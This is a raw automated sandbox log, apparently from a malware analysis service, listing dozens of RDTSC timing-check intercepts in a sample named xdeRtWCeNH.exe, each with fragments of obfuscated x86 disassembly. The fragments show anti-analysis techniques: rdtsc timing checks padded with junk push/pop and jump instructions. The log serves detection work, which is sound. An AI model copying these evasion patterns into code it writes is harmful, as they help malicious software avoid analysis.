Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A36 second address: 7430A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A3A second address: 7430A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB4B589h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A61 second address: 7430A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A67 second address: 7430A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A7E second address: 7430A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A82 second address: 7430A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A88 second address: 7430AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430AA7 second address: 7430AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430AAB second address: 7430AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430AB1 second address: 7430B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E9A8h 0x00000007 mov di, F854h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB4B589h 0x00000016 sbb esi, 7901A5C6h 0x0000001c jmp 00007FAD4CB4B581h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FAD4CB4B580h 0x00000028 sbb ax, 7E68h 0x0000002d jmp 00007FAD4CB4B57Bh 0x00000032 popfd 0x00000033 popad 0x00000034 lea eax, dword ptr [ebp-08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov eax, ebx 0x0000003c call 00007FAD4CB4B587h 0x00000041 pop esi 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430B37 second address: 7430B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB7BFFDh 0x00000013 sub al, FFFFFF96h 0x00000016 jmp 00007FAD4CB7C001h 0x0000001b popfd 0x0000001c push esi 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430BEE second address: 7430C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CF4Ah 0x00000007 mov bh, 96h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD4CB4B589h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430C17 second address: 7430C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430C1D second address: 7430C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430C3F second address: 7430C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FADBC90AA54h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 4809BC2Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430C6A second address: 7430CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-04h] 0x0000000d jmp 00007FAD4CB4B586h 0x00000012 mov dword ptr [esi+08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FAD4CB4B587h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430CA9 second address: 7430D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007FAD4CB7BFFEh 0x00000011 push 00000001h 0x00000013 jmp 00007FAD4CB7C000h 0x00000018 nop 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FAD4CB7BFFCh 0x00000022 add eax, 42B38FA8h 0x00000028 jmp 00007FAD4CB7BFFBh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430D0C second address: 7430D41 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FAD4CB4B584h 0x0000000d sub si, 0208h 0x00000012 jmp 00007FAD4CB4B57Bh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430D41 second address: 7430D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430D53 second address: 7430DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB4B581h 0x00000009 and esi, 71AC93D6h 0x0000000f jmp 00007FAD4CB4B581h 0x00000014 popfd 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAD4CB4B585h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430DA0 second address: 7430DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430DA6 second address: 7430E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAD4CB4B57Ah 0x00000008 pop esi 0x00000009 mov bx, 0696h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebp-18h] 0x00000013 jmp 00007FAD4CB4B57Dh 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FAD4CB4B583h 0x00000020 xor ch, FFFFFFCEh 0x00000023 jmp 00007FAD4CB4B589h 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FAD4CB4B581h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAD4CB4B57Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430E36 second address: 7430E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430E3C second address: 7430E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430E42 second address: 7430E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b call 00007FAD4CB7BFFDh 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB7C000h 0x00000016 sbb esi, 3C831038h 0x0000001c jmp 00007FAD4CB7BFFBh 0x00000021 popfd 0x00000022 pop eax 0x00000023 movsx edx, cx 0x00000026 popad 0x00000027 test edi, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 4C3F4B80h 0x00000031 push edi 0x00000032 pop ecx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FAF second address: 7430FE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 call 00007FAD4CB4B580h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov edx, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD4CB4B583h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FE3 second address: 7430FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FE7 second address: 7430FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FED second address: 7431012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 11616470h 0x00000013 mov bh, 57h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431012 second address: 74310A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAD4CB4B584h 0x00000012 sub eax, 6F7C33E8h 0x00000018 jmp 00007FAD4CB4B57Bh 0x0000001d popfd 0x0000001e call 00007FAD4CB4B588h 0x00000023 pushfd 0x00000024 jmp 00007FAD4CB4B582h 0x00000029 and si, 5178h 0x0000002e jmp 00007FAD4CB4B57Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+04h] 0x00000039 jmp 00007FAD4CB4B57Fh 0x0000003e mov dword ptr [edx+04h], eax 0x00000041 pushad 0x00000042 mov si, FABBh 0x00000046 push eax 0x00000047 push edx 0x00000048 mov dx, ax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74310A8 second address: 7431100 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c mov dx, DCC6h 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB7C007h 0x00000016 or al, 0000004Eh 0x00000019 jmp 00007FAD4CB7C009h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+08h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FAD4CB7BFFDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431100 second address: 743111E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743111E second address: 7431131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431131 second address: 7431137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431137 second address: 743113B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743113B second address: 7431166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+0Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD4CB4B585h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431166 second address: 743116B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743116B second address: 74311D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+10h] 0x0000000a pushad 0x0000000b mov dl, ch 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB4B581h 0x00000013 xor ecx, 7F771A56h 0x00000019 jmp 00007FAD4CB4B581h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+10h], eax 0x00000023 jmp 00007FAD4CB4B57Eh 0x00000028 mov eax, dword ptr [esi+14h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007FAD4CB4B57Dh 0x00000033 call 00007FAD4CB4B580h 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74311D9 second address: 743127D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c jmp 00007FAD4CB7C000h 0x00000011 mov eax, dword ptr [esi+18h] 0x00000014 jmp 00007FAD4CB7C000h 0x00000019 mov dword ptr [edx+18h], eax 0x0000001c pushad 0x0000001d mov eax, 159E9FBDh 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FAD4CB7C008h 0x00000029 add si, 42C8h 0x0000002e jmp 00007FAD4CB7BFFBh 0x00000033 popfd 0x00000034 jmp 00007FAD4CB7C008h 0x00000039 popad 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+1Ch] 0x0000003e jmp 00007FAD4CB7C000h 0x00000043 mov dword ptr [edx+1Ch], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743127D second address: 7431281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431281 second address: 7431287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431287 second address: 7431343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c jmp 00007FAD4CB4B580h 0x00000011 mov dword ptr [edx+20h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FAD4CB4B57Eh 0x0000001b and eax, 65998D18h 0x00000021 jmp 00007FAD4CB4B57Bh 0x00000026 popfd 0x00000027 push eax 0x00000028 pushad 0x00000029 popad 0x0000002a pop edi 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+24h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FAD4CB4B57Eh 0x00000036 adc ah, 00000078h 0x00000039 jmp 00007FAD4CB4B57Bh 0x0000003e popfd 0x0000003f mov ax, EEAFh 0x00000043 popad 0x00000044 mov dword ptr [edx+24h], eax 0x00000047 jmp 00007FAD4CB4B582h 0x0000004c mov eax, dword ptr [esi+28h] 0x0000004f pushad 0x00000050 movzx eax, bx 0x00000053 mov ebx, 552F53EEh 0x00000058 popad 0x00000059 mov dword ptr [edx+28h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FAD4CB4B587h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431343 second address: 7431347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431347 second address: 743134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743134D second address: 74313A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB7BFFEh 0x00000013 add eax, 457795C8h 0x00000019 jmp 00007FAD4CB7BFFBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+2Ch], ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FAD4CB7C001h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74313A1 second address: 74313F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB4B587h 0x00000009 adc al, 0000006Eh 0x0000000c jmp 00007FAD4CB4B589h 0x00000011 popfd 0x00000012 mov si, 32F7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d jmp 00007FAD4CB4B57Ah 0x00000022 mov word ptr [edx+30h], ax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov bx, cx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74313F8 second address: 74313FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74313FC second address: 7431436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FAD4CB4B586h 0x0000000c sbb eax, 7EE3BF48h 0x00000012 jmp 00007FAD4CB4B57Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ax, word ptr [esi+32h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431436 second address: 743143C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743143C second address: 743149A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAD4CB4B588h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FAD4CB4B57Bh 0x0000000f add eax, 2EACFEEEh 0x00000015 jmp 00007FAD4CB4B589h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov word ptr [edx+32h], ax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FAD4CB4B57Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743149A second address: 74314C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB7BFFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74314C1 second address: 74314D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B57Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74314D1 second address: 7431521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+34h], eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB7BFFBh 0x00000016 add ecx, 1A367FBEh 0x0000001c jmp 00007FAD4CB7C009h 0x00000021 popfd 0x00000022 pop eax 0x00000023 popad 0x00000024 test ecx, 00000700h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431521 second address: 7431530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431530 second address: 74315C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FADBC90A1D4h 0x0000000f jmp 00007FAD4CB7BFFDh 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 pushad 0x00000019 mov ebx, eax 0x0000001b jmp 00007FAD4CB7C008h 0x00000020 popad 0x00000021 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000025 jmp 00007FAD4CB7C000h 0x0000002a or dword ptr [edx+40h], FFFFFFFFh 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop edx 0x00000031 pushfd 0x00000032 jmp 00007FAD4CB7C006h 0x00000037 jmp 00007FAD4CB7C005h 0x0000003c popfd 0x0000003d popad 0x0000003e pop esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FAD4CB7BFFDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74315C5 second address: 7431620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB4B587h 0x00000009 sub ax, F4AEh 0x0000000e jmp 00007FAD4CB4B589h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FAD4CB4B583h 0x00000020 leave 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431620 second address: 743163B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C007h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7480C0C second address: 7480C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB4B580h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7480C2A second address: 7480C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB7BFFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 742076D second address: 7420773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420773 second address: 7420777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C005F second address: 73C0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C0063 second address: 73C007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C007h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C007E second address: 73C0103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007FAD4CB4B57Bh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FAD4CB4B584h 0x00000017 jmp 00007FAD4CB4B585h 0x0000001c popfd 0x0000001d jmp 00007FAD4CB4B580h 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FAD4CB4B580h 0x00000029 mov ebp, esp 0x0000002b jmp 00007FAD4CB4B580h 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FAD4CB4B57Ah 0x0000003a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C0103 second address: 73C0109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
